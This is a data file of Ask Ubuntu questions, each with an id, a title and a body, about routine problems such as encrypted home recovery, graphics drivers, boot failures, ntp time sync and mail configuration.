254732	new 12.04 on existing lvm with encrypted /home - can not login ?	after a few unsuccessful installation attempts i finally found this guide that looked all set to solve all my problems . after following it however - reinstalling and doing the `` repair the boot image after reinstallation '' bit by recreating /etc/crypttab later , i now have the following situation : i boot up and get the login screen , where i enter my password and get a breif flash of the following text : starting crash report submission checking battery state stopping system v runlevel compatibility plymouth command failed mountall : disconnecting from plymouth i hope i got it right , had to type in my password about 15 times to read it , it flashes so quickly , and then just returns to the login screen . i am able to log in as guest , but that is not very helpful i find . i am able to do ctrl+alt+f1 and log in tty1 . so clearly i have the password right : ) i must admit , in one of my previous attempts at reinstallation i did use a different password , which may have encrypted ( the already encrypted ? ) \home , which might have something to do with this mess . i do n't know if this is helpful , but in tty1 i did ecryptfs-unwrap-passphrase and my password was correct ie i get the hex code for dm-2 , which i believe is where my /home is . i 'm at my wits end , any help will be greatly appreciated ! update : ok , so i 've made some progress : i used a live usb to get back 'in ' , then ran lvm2 to mount the disk , which showed me two users ! one was my original one , and the second was one i set up in one of my failed reinstalls . both /homes encrypted of course : ) . i then did ( from here ) : ecryptfs-recover-private and the first encrypted partition that showed up was the second one , for which no password worked : ( but it prompts me `` do you know the password '' , so i was honest and said no . then it asked me for the 32 digit hex passphrase . and i had something similar written on a piece of paper - do n't ask me at what point in my previous cock-up-installs i had the foresight to write it down and it worked ! then it found the second encrypted partition ( or rather logical volume ) , which was my original one , for which i knew the password . hooray , so it mounted both in /tmp . this is all great , i can now backup the nonessential stuff i was n't too worried about . but is there a solution that does n't involve me reinstalling clean ? it seems like i have the same /home logical partition double encrypted or some weird thing like that . can i get rid of the second user somehow from live ubuntu ?
254734	dual installation with wubi	i have tried installing ubuntu alongside windows 8 with the wubi windows installer . now at startup when i click on ubuntu ( as opposed to windows ) i get the following message : windows boot manager file : \ubuntu\winboot\wubilder.mbr status : oxcooooo7b info : the applicationor operating system could n't be loaded because a required file is missing or contains errors . i have tried installing ubuntu 3 times and get the same message each time . what do i do from here ?
254736	why is some software not appearing in the `` available software '' options ?	i have installed and used some applications such as quod libet and others on ubuntu 12.04 . when i go under settings to tell ubuntu which software to use when opening specific files , quod libet and others are not in the selection . even when i click `` show other applications '' it is not listed as one i can use . now if i go through quod libet , i can tell it to play that file just fine so i know it will play , for instance .flac files , but why is it not showing up so i can select it as my default music client ? thanks and apologies if this is already in another thread . i was n't sure how to phrase the question .
254744	how to change guest user icon	how the `` guest user '' picture in ubuntu 12.04 can be changed ? the user picture appear , for example , in the user menu . this image is seen in every user 's menu , so i guess it 's just a matter of finding where the silhouetted bust image is , and being able to change it or creating a soft link with its name to the desired substitute picture . edit : since the guest user would never see the picture , i figure that there is nothing i would put in /etc/guest-session/skel/ ( as per how do i change the guest session defaults ) or in /etc/skel/ ( a folder mentioned in how to change default launcher icons in unity for a new user ? ) ?
254747	how to boot ubuntu from an external disk in a macbook ?	i want to install ubuntu to an external hard disc from my macbook pro 13.3 2012 ! i have try to and although the installation complete normal . then when i go to boot from the external disc it does n't appear ! it shows me only the recovery disc , the partition from windows and the normal partition .
254750	how to make putty ssh connection never to timeout when user is idle ?	i have a ubuntu 12.04 server i bought , if i connect with putty using ssh and a sudoer user putty gets disconnected by the server after some time if i am idle how do i configure ubuntu to keep this connection alive indefinitely ?
254751	is there a firewall that blocks a process and shows a dialog with buttons allow , drop , disable ?	currently i use ufw and firestarter , and i 'm just learning how to use a firewall . when i used windows there were a couple of firewalls that could block a process which tried to establish connection and show a dialog with the process name and buttons with preferred actions . is there deb package which can block connection and show which process tries to establish it , giving the user a choice what to do with the connection ? i really need it because i can not figure out which process was blocked by firestarter given that log entry : time port source destination protocol service feb 13 21:55:09 12350 192.168.1.100 193.120.x.x tcp unknown
254754	how can i install both 32 and 64 bit versions of the same -dev package ?	i 'm trying to install libsqlite3-dev for both i386 and amd64 on the same ubuntu 12.04 machine . i 'm developing an application that uses sqlite3 , and want to compile and test both the 32-bit and 64-bit versions . however it looks like the libsqlite3-dev : i386 package is incompatible with the libsqlite3-dev : amd64 , as apt keeps wanting to remove one when i install the other . is there a way to get both installed on the same system ?
254758	can i store a password in a bash script ?	is there some way to store ( for example hashed etc . ) secured password in a script that will be used during connection to server ? storing password and username as clear text in code for me is quite dangerous . oh ! one more thing - lets assume we can not use rsa keys . ideas ?
254759	issues installing qt5 & sdk for phone app	i followed the instructions for downloading the qt5 , but it failed . i downloaded qt4 from package manager in 12.10 . i then tried to install sdk through terminal , but to no avail did it bring it up it gives the following errors : w : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . please give further instructions as to how i may get qt5 release and sdk , so that i may start to write programs for ubuntu phone .
254761	black loading screen	this is the first time that i use xubuntu and i 'm experiencing a problem with it . d : i 've just installed xubuntu 12.10 desktop 64-bit on my laptop alongside with windows 8 . when i choose ubuntu from grub loader , the screen goes black and the lcd backlight goes off : the white-bar-on-blue-background xubuntu loading screen does n't appear , but after a few seconds the xfce login window materializes and the desktop enviroment after login works fine . when i shutdown or restart the system , the white-bar-on-blue-background xubuntu loading screen magically appears ! : ) i know that is only an aesthetic bug , but how can i bring back the xubuntu loading screen on boot ? please notice that my video card is the nvidia nvs 2100m , and that i 'm not experiencing any problem with xfce 's desktop . a huge kiss to anyone who will help me ! : *
254762	/etc/thnuclnt/.thnumod - what is that file for ?	~ > sudo find / -user root -perm -4000 -ls 710826 44 -rwsr-xr -- 1 root messagebus 42500 окт 3 22:31 /lib/dbus-1.0/dbus-daemon-launch-helper 658951 464 -rwsr-xr-x 1 root root 472124 июл 28 2011 /etc/thnuclnt/.thnumod ... and ~ > ll /etc/thnuclnt/.thnumod -rwsr-xr-x 1 root root 462k 2011-07-28 18:12 /etc/thnuclnt/.thnumod* ~ > file /etc/thnuclnt/.thnumod /etc/thnuclnt/.thnumod : setuid elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , statically linked , for gnu/linux 2.4.1 , stripped
254763	when using one monitor on top of another with different width , how to center the top one ?	i 'm trying to center the top monitor which is smaller then the bottom monitor . normally it would n't be a great issue but since i am splitting those into `` virtual '' screens using nvidia options in xorg.conf and unity seems to ignore it , i need to set the position of top screen to be exactly in the middle ( +960 ) the settings/displays user interface wo n't show me the position in numbers when i drag the top screen , and it does not `` stick '' when near the center of the bottom screen , nor does it let me specify numbers . how can i do that manually ?
254768	how to resume/bring back to foreground x-session running in the background ?	i have started an x session on tty1 ctrl alt f1 by : startx -- :1 now after i went to my 'standard ' x session to ctrl alt f7 and then back to tty1 and get the prompt instead of x session . how can i recover/bring back my x session that i started ? and second thing about that , i tried killing process that i started with startx so i removed /tmp/.x1-lock and now i get this when i try to startx- [ 205846.354 ] _xservtranssocketinetcreatelistener : ... socketcreatelistener ( ) failed [ 205846.354 ] _xservtransmakeallcotsserverlisteners : server already running [ 205846.354 ] fatal server error : [ 205846.354 ] can not establish any listening sockets - make sure an x server is n't already running [ 205846.355 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 205846.355 ] ( ee ) please also check the log file at `` /var/log/xorg.1.log '' for additional information . [ 205846.356 ] ( ee ) [ 205846.356 ] server terminated with error ( 1 ) . closing log file .
254769	problem with update manager and software center	e : type 'http : //pastebin.ubuntu-gr.org/f50818e5c ' is not known on line 1 in source list /etc/apt/sources.list that is the message when i try to update . when i try to open software center its not opening !
254776	ubuntu server ssh after reboot : permission denied ( publickey )	i have a server setup where i can ssh to from my mac . the setup is made with a trusted key and it works perfect . but whenever i reboot the server and i that try to login using ssh my_user @ ip then it says : permission denied ( publickey ) . however if i physically go to the server and log in as my_user , then suddenly i can get remote access by ssh from my mac as well . what do i need to change in my setup ?
254785	migrating the / volume ?	after a hardware failure of the motherboard and subsequently a few disks , i am migrating the root partition over to another drive . however , given /dev and other peculiar locations i was wondering whether my method is sound ? : rsync -avzphakxs /mnt/old/ /mnt/new/ note that the new designated root drive is mounted as /mnt/new and the old one as /mnt/old . will this work or will it fail ? i would find out later this week anyway simply by trying , but getting an authoritative answer and perhaps a working alternative would save me some hours .
254786	can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 )	solution : finaly i solved my problem ! ! ! sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings problem : i have no idea how i can solve this issue . i tried already some advices from internet , but without success . i use this way to setup nvidia and cuda . https : //wiki.ubuntu.com/bumblebee # installation http : //samiux.blogspot.kr/2011/05/howto-nvidia-cuda-toolkit-40-on-ubuntu.html so this i get , if i type optirun glxgears [ 115.282141 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 115.282190 ] [ error ] aborting because fallback start is disabled . this is my bumbleblee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver= # # client options . will take effect on the next optirun executed . [ optirun ] # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver= [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau
254789	12.10 : missing window borders after update	i 've had 12.10 x64 for a little over a month now with no problems . the updates installed nicely up until today and the gpu ( geforce 520gtx ) driver worked just fine right out of the box in unity and xbmc ( including 1080p decoding ) . so , today i installed around a week 's worth of updates and after reboot the window borders ( borders , menu bars and launcher ) are missing . i tried following some directions i found in various forums but any of them did n't do any good . the only way i get the bars back is by uninstalling nvidia-current but that really is n't a solution . so , my question is how do i get my pc running smoothly again ? i 'm guessing this ca n't be that hard to fix since everything worked without a hitch before the update . additionally i 'd love to know why this happened in the first place . i have n't touched any of the display configs because it all worked fine from the beginning . i find it a little troubling that answering yes to a harmless looking update prompt can make the system practically unusable if the user does n't know how to switch tty : )
254791	how to install nvidia drivers and run unity 3d ?	i am having a hard time installing the nvidia drivers on my dell xps l502x . specs : intel core i5 ( 2nd gen ) 8gb ram nvidia geforce gt 525m/ also has integrated intel graphics as well running ubuntu 12.04 lts when i install nvidia-current from software center and try to go to the nvidia settings , i get the following message : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just runnvidia-xconfigas root ) , and restart the x server how can i fix this because i want to try running unity 3d . i did a lot of searching and tried all of the suggestions out there but nothing worked . i know my graphics card is supported in the nvidia-current driver from the software center because it is listed in the /usr/share/doc/nvidia-current/readme.txt.gz . any help is appreciated .
254792	is there a way to install 12.10 from usb via terminal ?	i had 12.10 running on a dell dimension 2400 with a celeron cpu at 2.4ghz and 1001.3mb memory . i attempted to correct chinese characters and blanked the partition . i have 12.10 on usb and mint 13 on another partition . can i install from the usb to the blanked partition via terminal ? and if yes : how ? i am new to ubuntu .
254794	how can i share my internet connection via bluetooth ?	i 'm running ubuntu 12.04 i have a hp laptop brand and i would like to share my internet connection via bluetooth i searched on google but i found nothing serious can you help me please ?
254797	notify osd through wine	is there a way of making wine use the default ubuntu 10.10 notification b bubble ( which i think it is called notify osd ) instead of the classic bubble that wine uses . -thanks
254798	for printing to labels , shifting pdf to align with labels at print time ?	i 'm printing to labels . the source pdf is offset somewhat from the labels . i can measure the offset ... is there a way to nudge , scale or skew the printout to match up ?
254799	lubuntu live cd boot drops to busybox console	trying to install lubuntu 12.10 to an old pc ( duron 1200 on asus a7n266-vm with 756mb ) . i did an md5 check of the iso . first couple of burns to cd-rw would n't boot , so tried again to cd-r with verify option in k3b . the mb does not support boot from a usb flash drive . this booted to a live system , but the install failed . could be this problem https : //bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/996568 since then i struggle get it to boot again from that cd . always drops to busybox , sometimes with 'unable to find a medium containing a live file system ' . is it possible the cd has failed in the few hours since i burned it ?
254800	how can i update the ubuntu sdk preview from the qt 5 beta ppa to the qt 5 release ppa	when the ubuntu sdk preview was announced on the 2nd of january , it was based on the qt 5 beta release ( as qt 5 had not yet been released and packaged for ubuntu ) . at some point , the qt 5 release was packaged on a separate ppa and the ubuntu sdk migrated to be based on the contents of that ppa . new installs work fine as described on the ubuntu sdk installation instructions , but i 'd like to know how those of us who installed it on release day on the 2nd can migrate to the latest version of the sdk , as the change of ppas requires a manual upgrade . this seems to be related to reports of folks who get the `` error importing ubuntu.components '' message when upgrading the sdk .
254803	can i take an image of login person after 3 login attempts fail ?	is there any way to take an image after 3 login attempts fail.and later i want shutdown system and before this i would like to block all ports so the person cant access the system thorough any boottable device . here i only find the way of capture image ... but rest all stuff still remain.as it is .
254804	where are my wireless error logs ?	when i type ifconfig it shows : eth1 link encap : ethernet hwaddr e4 : d5:3d:70:81 : b3 inet addr:192.168.0.6 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :e6d5:3dff : fe70:81b3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:103728 errors:20 dropped:0 overruns:0 frame:84061 tx packets:79449 errors:46 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:127523350 ( 127.5 mb ) tx bytes:11102140 ( 11.1 mb ) interrupt:16 it shows errors 20 , and errors 46 where can i find these errors ? i 'm having trouble with my wireless and trying to debug . thanks !
254806	how to give a new user permissions to call sudo without a prompt for sudo password ?	i am setting up a server in amazon ec2 . i created an image from amazon 's provided images of ubuntu x64 12 lts . my goal is to set up a secure svn server there , where access is only possible by ip address , ssh and certificates . i also need to migrate existing public keys from an old server . having played with permissions i managed to add another user account , but somehow locked myself ( ubuntu ) out of the server . remote root log in is disabled , and i locked ubuntu user . ooops . this is why i would like to create a temporary user account , say foo . if i lock it out , i still have ubuntu . i would like this user to have the same privileges as ubuntu , i.e . i want to do something like sudo apt-get install subversion problem when i created a new user and sshed to the server , the server always asked me for sudo password , when i called anything starting from sudo question how to add a new user with the same privileges as ubuntu , so i can call sudo ... without being prompted with a sudo password ? this is what i have done so far : # add user sudo useradd -m -g ubuntu , adm , dialout , dip , plugdev , netdev , admin foo # add public key for ssh sudo -s cd /home/foo mkdir .ssh cd .ssh nano authorized_keys generate certificate in puttygen add public key to authorized_keys # set permissions for ssh to work chown -r foo /home/foo/.ssh chgrp -r foo /home/foo/.ssh chmod 0755 /home/foo chmod 755 /home/foo/.ssh chmod 644 /home/foo/.ssh/authorized_keys # add foo to sudoers sudo usermod -ag sudo foo # # check permissions ls -lha /home/foo ls -lha /home/foo/.ssh
254807	why does my nexus not boot ?	i 'm trying to get ubuntu on my nexus for more than a day now and i 'm not able to get passt the initial image installation . i managed to get to the boot screen and it turns wireless on , then off and on again . after that there is no text but just a black screen . i 've waited quite some time every time it happened but it never went further . i 'm using a mac and know that it 's not even supported yet but i followed the manual installation and as it seems part of it worked . i tried to use a vm but i 'm not able to mound my usb ports there so there is no use : / after the normal install i tried it with multirom but experience the same problem ... is there any hint on what i did wrong ? here are my steps . downloaded and extracted todays build ( 13.2.13 ) erased boot and userdata with fastboot flashed boot and userdata ( even changed order ) i also tried wiping/formatting everything on the tablet first and setting permissions within twrp after messing with the permissions it even returned a mount error while booting . but no success . *info : yesterdays build fixed it .
254808	where are ( partial ) screenshot stored or how to specifiy location ?	when i use the print screen key - prtsc - i get the option of where to save . that works fine . however when i shift-ctrl-prtsc i hear the picture being 'taken ' but i do n't get a chance to specify the location . i have checked the following locations and they do not have the screenshot : my desktop my documents my home directory
254809	i ca n't install flash player	i tried every version of flash player for ubuntu 12.10 , but it does n't work . when attempting to install it , i got this error . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package flashplugin-nonfree i found this solution , i ran : sudo apt-get install -f and then sudo apt-get update which i found from some other post that was trying to solve dependencies . then i ran sudo apt-get install flashplugin-nonfree but it still does n't work !
254813	preferred mailer in ubuntu	i am looking for a mail option on my ubuntu server that i can code into my shell script to trigger a script completion by email . what is the best way to complete this task code wise and mailer wise ? i had hoped outlook would work but i see wine indicates it as bad . the email accounts will be work accounts . this will be my first time setting up email function in a linux box . i have typically used ubuntu as a mod server for files . edit : im looking to send from the server when the script is complete . if any better suggestions are available i am open to change .
254817	updating less css	i had less css working on my 12.1 ubuntu install fine . i was using it by running lessc from command line . when i run lessc -v i get : lessc 1.3.0 ( less compiler ) [ javascript ] i need to upgrade to 1.3.3 , after reading a lot on the web i tried the npm install ( as i thought that was how i installed initially ) `` npm install less '' this returned : npm http get https : //registry.npmjs.org/less npm http 200 https : //registry.npmjs.org/less npm http get https : //registry.npmjs.org/less/-/less-1.3.3.tgz npm http 200 https : //registry.npmjs.org/less/-/less-1.3.3.tgz npm http get https : //registry.npmjs.org/ycssmin npm http 200 https : //registry.npmjs.org/ycssmin npm http get https : //registry.npmjs.org/ycssmin/-/ycssmin-1.0.1.tgz npm http 200 https : //registry.npmjs.org/ycssmin/-/ycssmin-1.0.1.tgz less @ 1.3.3 node_modules/less now however i still get verison 1.3 when running lessc -v. i think i must have installed originally through apt-get . i am now confused , so to the question . is installing through npm different than apt-get , i.e . a different implementation ? how can i get to a 1.3.3 install ? many thanks ,
254820	how to solve a syntax error while updating ?	i keep getting the next message when i try to update or install a package : e : syntax error /etc/apt/apt.conf:229 : extra junk at end of file i ca n't use synaptic or the download manager or the terminal . i 'm using ubuntu 10.04 .
254825	modify kde desktop theme	i 'm using the caledonia theme in kde , but the icons in the task manager are way too big . is there a way to change the size of all the icons ? this is how it looks right now . i would prefer it if the size was the same as quicklaunch ( 16x16 )
254826	how to force a clock update using ntp ?	i am running ubuntu on an arm based embedded system that lacks a battery backed rtc . the wake-up time is somewhere during 1970 . thus , i use the ntp service to update the time to the current time . i added the following line to /etc/rc.local file : sudo ntpdate -s time.nist.gov however , after startup , it still takes a couple of minutes until the time is updated , during which period i can not work effectively with tar and make . how can i force a clock update at any given time ? update 1 : the following ( thanks to eric and stephan ) works fine from command line , but fails to update the clock when put in /etc/rc.local : $ date ; sudo service ntp stop ; sudo ntpdate -s time.nist.gov ; sudo service ntp start ; date thu jan 1 00:00:58 utc 1970 * stopping ntp server ntpd [ ok ] * starting ntp server [ ok ] thu feb 14 18:52:21 utc 2013 what am i doing wrong ? update 2 : i tried following the few suggestions that came in response to the 1st update , but nothing seems to actually do the job as required . here 's what i tried : replace the server to us.pool.ntp.org use explicit paths to the programs remove the ntp service altogether and leave just sudo ntpdate ... in rc.local remove the sudo from the above command in rc.local using the above , the machine still starts at 1970 . however , when doing this from command line once logged in ( via ssh ) , the clock gets updated as soon as i invoke ntpdate . last thing i did was to remove that from rc.local and place a call to ntpdate in my .bashrc file . this does update the clock as expected , and i get the true current time once the command prompt is available . however , this means that if the machine is turned on and no user is logged in , then the time never gets updates . i can , of course , reinstall the ntp service so at least the clock is updated within a few minutes from startup , but then we 're back at square 1 . so , is there a reason why placing the ntpdate command in rc.local does not perform the required task , while doing so in .bashrc works fine ?
254835	how can i know the usb port ?	i 'm working on a project with an atmega1280 ( atmel ) board . i want to take a look at the stack , so i 'm trying to do an ocd ( on chip debugging ) . in the tutorial is written : use this avrdude command to program the fuses on the atmega1280 to enable ocd and jtag : avrdude -p < port > -c < programmer > -p m1280 -u hfuse : w:0x1a : m -v replace port with the port to which your programmer is connected , and programmer with the programmer type . at this point , my question is : how can i know the port of the usb in kubuntu ?
254836	how can i make libreoffice writer have window decorations again in gnome 3 ?	i 'm not sure whether i 've discovered a feature or a bug of libreoffice writer v. 3.5.4.2 in gnome 3.4 on ubuntu 12.04 . either way , i ca n't figure out how to get things back to how they normally are . i accidentally engaged writer 's full screen function by pressing ctrl+shift+j on my keyboard . when i had writer come back out of full screen mode , though , it lacked a window border . that is , it still has a menu bar and tool bars , but is otherwise stuck at full-screen without a close button or title bar . i am unable to move the window using the top area of the window or alt+click . writer is not frozen . however , i can toggle this new window mode back and forth from the actual full-screen mode ( which lacks toolbars or a top menu ) , and can close the window using alt+f4 . other libreoffice programs do not show this window mode when i open them . when i close writer and then open other files with it , though , the files all show up in this semi-full-screen mode . since it appears to be isolated to writer , i assume that this is a feature rather than a bug . might any of you know how to turn it off ?
254837	installing ubuntu 12.04 lst along windows without formatting any drive	i am facing a problem while installing ubuntu along with win8 . the specs about my pc are following : 500 gb hdd ( c:100 , d:100 , f:50 , g:100 h:100 i:50 ) and every drive has important data , and are ntfs i have used lili usb creator for creating bootable usb for ubuntu 12.04 lst . when i boot from usb , it asks me if i want to overwrite windows 8 or do something else , and i chose do something else . now the thing is , it shows me 3 drives having weird names ( /sdv like something ) . first one is reserved ( 100 mb ) second one is c ( 100 gb ) and the last one is what left of hard disk memory ( 400 gb ) . i have find out that i need to convert file system from ntfs to ext4 for installing ubuntu , which require formatting of my drives , and in this case either format c ( windows 8 ) or what left of hard disk memory ( every other thing ) . can someone explain me what should i do to prevent from formatting any of my drive ? ? thank you ! !
254838	can not shutdown ubuntu 12.10	when i tell ubuntu to shutdown it appears to follow the normal procedure but after the screen goes blank the process seems to stop . the bluetooth and wifi leds are lit up as well as the batter and wall power . also the usb ports still have power . this is on a thinkpad x61 . is there a way to diagnose this problem ?
254839	how to play bulgarian/cyrillic subtitles	hello members i 'm running ubuntu 12.04.1 lts 32 bit my only problem is that i 'm from bulgaria and when a download movie with bulgarian subs vlc player is not showing them properly how can i fix that ?
254841	is it possible to burn an iso disk along with some documents	i want to burn ubuntu boot disk on a dvd along with some documents i need . this way i can launch ubuntu on someone else 's computer in case i need to work . this would allow me to have important notes and commands i use frequently on some text files on the disk .
254844	playing a midi keyboard without jack / how to use jack and pulseaudio/alsa	so , i havea midi keyboard but i 'm not really motivated to play when i have to set up jack and everything else just to get one sound out of it . the problem is that whenever i start jack i ca n't play sounds from youtube , move player , rhythmbox , etc . because jack is taking over the soundcard . here 's how i start jack and my midi keyboard : $ pulseaudio -- kill $ jackd & qjackctl & amsynth ( plug in keyboard ) so , apparently jack needs the pulseaudio soundcard . but here 's how i exit jack : $ alsa force-reload i 've tried pulseaudio -- start but this seems to be the only thing that works . so i 'm not really sure whether it 's pulseaudio or alsa that i need to play rhythmbox/youtube/etc . so , my question is : is there any way i can play my midi keyboard either without jack or finding a way i can use jack and still play rhythmbox etc. ? or maybe a non-jack midi controller ? i 've tried $ jackd -d alsa and that does n't really do anything ... i still ca n't hear non-jack audio ... i do n't really know what that 's supposed to do either , i admit . i 'm using ubuntu 12.10 on an acer ao722 with an alesis qx49 .
254845	photo downloading	i have a digital nikon coolpix . no more microsoft after a friend download ubuntu . so far liking it as in security of past virus ! anyway ; love posting photos on facebook and was able to do seamlessly with the microsoft program ... however , no luck with the new ubuntu . found and printed out instructions - but nothing working . it does not `` automatically detect when plugging in and offer to import photos automatically '' . attmpted the f-spot application . opened the `` applications - then graphics - but graphics drop screen did not show the `` f-spot photo manager , therefore no `` file-import '' . help ! thank you : - )
254847	how do i adjust the pointer speed and scrolling speed of a trackpad ?	how can i increase the pointer speed and scrolling speed of apple trackpad beyond the max speed allowed in system settings ? i 'm using ubuntu 12.04.01 . please see below the mouse and trackpad settings also i have installed the package kde-config-touchpad and not installed utouch . i have used this blog for doing so .
254855	how do i redirect google chrome logs out of my kern.log	i have hundreds of these log entries : feb 13 16:46:56 xxxx kernel : [ 42982.178922 ] type=1701 audit ( 1360799216.852:1514 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=5529 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=2 compat=0 ip=0x7f3060b476b0 code=0x50000 feb 13 16:46:56 xxxx kernel : [ 42982.178943 ] type=1701 audit ( 1360799216.852:1515 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=5529 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=2 compat=0 ip=0x7f3060b476b0 code=0x50000 this behavior is explained here : why is there `` seccomp '' events related to google chrome in syslog ? . how do i redirect them out of my kern.log file ? i plan to figure out this log later , but i have other projects that would be easier with a smaller kern.log file . i have seen this : how to enable logging for google chrome in ubuntu 12.04 ? the file mentioned is not under my home folder . default install . edit : basic plug-ins . single profile . checked the menu item and the only option % u ( no -- debug or anything like that ) about : google chrome 24.0.1312.69 ( official build 180721 ) os linux webkit 537.17 ( @ 140072 ) javascript v8 3.14.5.6 flash 11.5.31.139 user agent mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.17 ( khtml , like gecko ) chrome/24.0.1312.69 safari/537.17
254859	libreoffice does n't start	after i managed to make ubuntu start properly and made it look ok i just realized the libreoffice does n't work at all . it shows the start screen and then it just stops ... nothing else . i tried to have it running from the terminal and this is what i got : libreoffice -- writer bus error ( core dumped ) any clues about what should i try ? please help ... otherwise i have no choice but to go back to windows ... please help thanks ! stelian
254860	how to remove encryption from harddrive in ubuntu 12.04 ?	greetings i have `` inherited '' a ubuntu 12.04 system installed on a sun server . judging by the output of the history command the system is broken from all the ./configure -- prefix=/usr & & make & & make install commands , replacing most of the software with some custom versions that apt is not aware of . i have backed up all the data and i want to make a clean and functional installation but when i tried to reformat via a live cd it spit out an i/o error . i booted back into ubuntu and fsck'ed every partition ( remounted / read-only before fsck ) ; there was no corruption on the hard disk . the only logical thing i can assume is that it 's encrypted and judging from the ecryptfs-kthread process it seems that way . how can i decrypt the whole harddisk in order to reformat and install everything clean ?
254863	gnome-keyring error sending email in mutt	here is my .msmtprc : defaults account gmail host smtp.gmail.com from yy @ gmail.com port 587 auth on tls on tls_starttls on tls_trust_file /etc/ssl/certs/ca-certificates.crt user yy @ gmail.com password xxxxxxxx logfile ~/.msmtp.log account default : gmail here is my /etc/muttrc set sendmail= '' /usr/bin/msmtp '' set use_from=yes set realname= '' xxxx '' set from= '' yy @ gmail.com '' set envelope_from=yes set charset= '' utf-8 '' set send_charset= '' utf-8 '' set locale= '' zh_cn.utf-8 '' set content_type= '' text/html\ ; charset=utf-8 '' when i input : echo `` test '' | mutt -s `` subject '' xxxxx @ 163.com warning : gnome-keyring : : could n't connect to : /home/debian/.cache/keyring-hf6ink/pkcs11 : no such file or directory what is the matter ?
254865	selectively deactivate ( power off ) pcie slot ?	the title basicly says what i 'd like to do : my machine has integrated hd4000 graphics and a more powerful pcie card hd4000 is enough for everyday use , pcie should be used only for gaming with windows through bios i can set the primary card i 'd like to disable ( switch off , suspend ) the pcie slot when in linux to conserve power and also to turn off the pcie card 's fan is this possible ? - thanks in advance !
254867	can a modified ubuntu flash drive installation be installed on another system ?	would it be possible to install ubuntu 12.04 lts to a flash drive , install all the updates and desired apps such as flash and then install it updates and all to another system ? i 'm hoping i can save a lot of time and repetition by doing it all once on the flash and then maybe applying a few tweaks after i install it on an actual machine .
254868	how to access windows partitions from linux terminal ?	how to access windows partitions like c or d from linux terminal using commands because i want to work on some .cpp files there using `` gcc '' compiler as i do n't want to change their directory to e.g . linux desktop i used cd /dev/sda2 but nothing happened . please help
254872	ubuntu 12.10 64 bit install freezes	i have a uefi pc with the following specs : amd trinity a10 quad core 3.4 ghz , 8 gb ram , 1.5 tb hdd . my problem is that when i boot from the ubuntu 12.10 64 bit install disc , i get to the efi bootloader with the option to install ubuntu . i scroll over `` install ubuntu '' and press enter . from here , the screen just goes black and the installation hangs there . i have tried redownloading the iso , checking the md5 , trying different types of dvds , but nothing seems to be working . any ideas ?
